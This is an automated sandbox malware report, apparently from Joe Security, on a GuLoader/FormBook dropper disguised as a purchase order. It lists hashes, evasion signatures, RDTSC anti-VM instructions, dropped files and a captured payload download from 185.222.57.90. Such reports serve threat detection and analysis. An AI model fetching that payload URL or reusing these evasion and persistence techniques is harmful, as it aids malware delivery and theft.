Windows Analysis Report
Purchase Order Purchase Order Purchase Order Purchase Order.exe

Overview

General Information

Sample name: Purchase Order Purchase Order Purchase Order Purchase Order.exe
Analysis ID: 1557894
MD5: b9a03fb0c2c7f23a1e4ccb0d79c5053c
SHA1: 4d87c4ed89d8b92f2b6849dc6af6a8850f8e5e7c
SHA256: 099369eb025c3e23b6669c872ac2572e7bc4ba9200eb4d6318284983ddb78e3f
Tags: exe, GuLoader, user-abuse_ch
Infos:

Detection

FormBook, GuLoader
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.2478615286.0000000034480000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.1990093739.0000000003FB1000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
      No Sigma rule has matched
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-11-18T18:11:16.708256+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49711 | 185.222.57.90 | 80 | TCP

      AV Detection

      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe | ReversingLabs: Detection: 27%
      Source: Yara match | File source: 00000005.00000002.2478615286.0000000034480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: wntdll.pdbUGP source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2409235089.0000000034633000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2407137260.000000003448F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2409235089.0000000034633000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2407137260.000000003448F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe | Code function:
        0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose
        0_2_004065FD FindFirstFileW,FindClose
        0_2_00402868 FindFirstFileW
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe | File opened:
        C:\Users\user
        C:\Users\user\AppData\Roaming\Microsoft\Windows
        C:\Users\user\AppData
        C:\Users\user\AppData\Roaming
        C:\Users\user\AppData\Roaming\Microsoft
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
      Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49711 -> 185.222.57.90:80
      Source: global traffic | HTTP traffic detected:
        GET /zFSrvbrRquo53.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Host: 185.222.57.90
        Cache-Control: no-cache
      Source: unknown | TCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2450313980.00000000047B8000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2450313980.00000000047F6000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2450798080.0000000004910000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://185.222.57.90/zFSrvbrRquo53.bin
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2450313980.00000000047B8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.222.57.90/zFSrvbrRquo53.binlb
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.0000000000649000.00000020.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.0000000000649000.00000020.00000001.01000000.00000006.sdmp | String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe | Code function:
        0_2_00405461 GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,LdrInitializeThunk,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard

      E-Banking Fraud

      Source: Yara match | File source: 00000005.00000002.2478615286.0000000034480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      System Summary

      Source: initial sample | Static PE information: Filename: Purchase Order Purchase Order Purchase Order Purchase Order.exe
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe | Process Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe | Code function:
        5_2_348535C0 NtCreateMutant,LdrInitializeThunk
        5_2_34852C70 NtFreeVirtualMemory,LdrInitializeThunk
        5_2_34852DF0 NtQuerySystemInformation,LdrInitializeThunk
        5_2_34852B60 NtClose,LdrInitializeThunk
        5_2_34854650 NtSuspendThread
        5_2_34853090 NtSetValueKey
        5_2_34853010 NtOpenDirectoryObject
        5_2_34854340 NtSetContextThread
        5_2_34852CA0 NtQueryInformationToken
        5_2_34852CC0 NtQueryVirtualMemory
        5_2_34852CF0 NtOpenProcess
        5_2_34852C00 NtQueryInformationProcess
        5_2_34852C60 NtCreateKey
        5_2_34852DB0 NtEnumerateKey
        5_2_34852DD0 NtDelayExecution
        5_2_34852D00 NtSetInformationFile
        5_2_34852D10 NtMapViewOfSection
        5_2_34853D10 NtOpenProcessToken
        5_2_34852D30 NtUnmapViewOfSection
        5_2_34853D70 NtOpenThread
        5_2_34852E80 NtReadVirtualMemory
        5_2_34852EA0 NtAdjustPrivilegesToken
        5_2_34852EE0 NtQueueApcThread
        5_2_34852E30 NtWriteVirtualMemory
        5_2_34852F90 NtProtectVirtualMemory
        5_2_34852FA0 NtQuerySection
        5_2_34852FB0 NtResumeThread
        5_2_34852FE0 NtCreateFile
        5_2_34852F30 NtCreateSection
        5_2_34852F60 NtCreateProcessEx
        5_2_348539B0 NtGetContextThread
        5_2_34852AB0 NtWaitForSingleObject
        5_2_34852AD0 NtReadFile
        5_2_34852AF0 NtWriteFile
        5_2_34852B80 NtQueryInformationFile
        5_2_34852BA0 NtEnumerateValueKey
        5_2_34852BE0 NtQueryValueKey
        5_2_34852BF0 NtAllocateVirtualMemory
        0_2_0040338F EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe | File created: C:\Windows\Fonts\Gullis.lnk
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348DAB405_2_348DAB40
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348DFB765_2_348DFB76
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: String function: 3480B970 appears 241 times
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: String function: 34855130 appears 55 times
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: String function: 3488EA12 appears 70 times
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: String function: 3489F290 appears 100 times
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: String function: 34867E54 appears 93 times
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order Purchase Order Purchase Order Purchase Order.exe
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2407137260.00000000345B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order Purchase Order Purchase Order Purchase Order.exe
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2409235089.0000000034760000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order Purchase Order Purchase Order Purchase Order.exe
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal80.troj.evad.winEXE@3/8@0/1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_0040338F EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_0040338F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_00404722 GetDlgItem,SetWindowTextW,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,LdrInitializeThunk,MulDiv,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,SetDlgItemTextW,0_2_00404722
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk,0_2_00402104
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumpsJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Local\Temp\nsr584D.tmpJump to behavior
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exeReversingLabs: Detection: 27%
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile read: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeProcess created: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeProcess created: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"Jump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Gullis.lnk.0.drLNK file: ..\..\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\lensaftalerne.sla
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: wntdll.pdbUGP source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2409235089.0000000034633000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2407137260.000000003448F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2409235089.0000000034633000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2407137260.000000003448F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.0000000000649000.00000020.00000001.01000000.00000006.sdmp

      Data Obfuscation

      Source: Yara matchFile source: 00000000.00000002.1990093739.0000000003FB1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_70121B63 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70121B63
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_70122FD0 push eax; ret 0_2_70122FFE
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348109AD push ecx; mov dword ptr [esp], ecx5_2_348109B6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: \purchase order purchase order purchase order purchase order.exe
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumpsJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\VedbendensJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Vedbendens\Hoveddelenes.haaJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\ClapJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Clap\Exoascaceous73.traJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\TidenderneJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Atomizing.EftJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Underemphasizing70.tioJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\sulkens.dicJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\KlapperesJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes\vec.jpgJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeAPI/Special instruction interceptor: Address: 476F6B9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeAPI/Special instruction interceptor: Address: 334F6B9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeRDTSC instruction interceptor: First address: 4733B9E second address: 4733B9E instructions: 0x00000000 rdtsc 0x00000002 test ah, dh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F039C8178A6h 0x00000008 inc ebp 0x00000009 test dh, dh 0x0000000b inc ebx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeRDTSC instruction interceptor: First address: 3313B9E second address: 3313B9E instructions: 0x00000000 rdtsc 0x00000002 test ah, dh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F039D1785B6h 0x00000008 inc ebp 0x00000009 test dh, dh 0x0000000b inc ebx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E21AE rdtsc 5_2_348E21AE
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeAPI coverage: 0.3 %
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe TID: 4280Thread sleep time: -30000s >= -30000sJump to behavior
